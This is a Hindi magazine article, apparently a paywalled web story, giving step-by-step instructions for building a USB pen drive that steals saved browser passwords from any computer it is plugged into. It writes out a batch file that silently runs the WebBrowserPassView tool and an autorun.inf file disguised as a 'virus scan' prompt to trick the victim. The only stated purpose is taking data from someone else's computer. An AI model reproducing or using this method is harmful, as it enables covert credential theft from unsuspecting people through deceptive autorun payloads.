हैकिंग का इस्तेमाल हमेशा गलत कामों के लिए ही किया जाए ऐसा जरूरी नहीं. हैकिंग का इस्तेमाल सही उद्देश्य को पूरा करने के लिए भी किया जा सकता है. आमतौर पर गूगल पर इससे जुड़ी सारी जानकारी मुफ्त में उपलब्ध है. हम अपनी इस स्टोरी के जरिए आपको एक ऐसी ट्रिक बताने जा रहें हैं जिसकी मदद से आप एक पेनड्राइव को ऐसी खास तकनीक से लैस कर सकते हैं जो किसी भी डिवाइस जैसे कि पीसी में लगाते ही उसके सीक्रेट फोल्डर का पासवर्ड चुरा सकता है.

जरुरतें

  • पेन ड्राइव
  • कंप्यूटर या लैपटौप
  • Web Browser Pass View

जानिए स्टेप बाई स्टेप

  • सबसे पहले अपने कंप्यूटर डिवाइस में Web Browser Pass View को इंस्टौल करना होगा. यह ध्यान रहे कि आप सही फाइल को इंस्टौल कर रहे हैं. साथ ही, फाइल में कोई ब्रेक नहीं है.
  • अब पेन ड्राइव को कंप्यूटर से कनेक्ट करें और उसमें मौजूद सभी डाटा को रिमूव कर दें. पेन ड्राइव को फौर्मेंट करने के लिए आप NTFS फौर्मेट का विकल्प चुन सकते है.
  • इन सब प्रक्रिया के बाद, USB नाम से पेन ड्राइव के अंदर एक नया फोल्डर बनाएं. अब नए फोल्डर के अंदर Web Browser Pass View फाइल को रखें और नेक्स्ट स्टेप में जाएं.

  • अब अपने कंप्यूटर में नोटपैड को ओपन करें और एक नई फाइल बनाएं. उस फाइल के अंदर “ @echo off cls start \usb\WebBrowserPassView.exe /shtml1.html” कोड को पेस्ट करें और इसे USB Driver.bat के रूप में सेव करें. अब दोबारा एक नई फाइल बनाएं और दूसरे कोड “[autorun] open=usbdriver.bat Action=Perform s Virus Scan“ को पेस्ट करें. इस फाइल को inf. नाम से सेव करें.
  • इसके बाद, अभी बनाए दोनों नोटपैड फाइल्स को पेन ड्राइव में मूव कर दें और अब आपका काम हो गया. अब आप इस पेनड्राइव को उस कंप्यूटर में लगाएं जिसके डाटा को आप पाना चाहते हैं. पेन ड्राइव को लगाने के बाद आपको वायरस स्कैन करने के लिए कहा जाएगा. उसे एक्सेप्ट करें और परफौर्म करने दें. आपको पेन ड्राइव के अंदर लौगिन करने पासवर्ड मिलेगा जिसे आप बाद में एक्सेस कर सकते हैं.

आगे की कहानी पढ़ने के लिए सब्सक्राइब करें

डिजिटल

(1 साल)
USD10
 
सब्सक्राइब करें

डिजिटल + 24 प्रिंट मैगजीन

(1 साल)
USD79
 
सब्सक्राइब करें
और कहानियां पढ़ने के लिए क्लिक करें...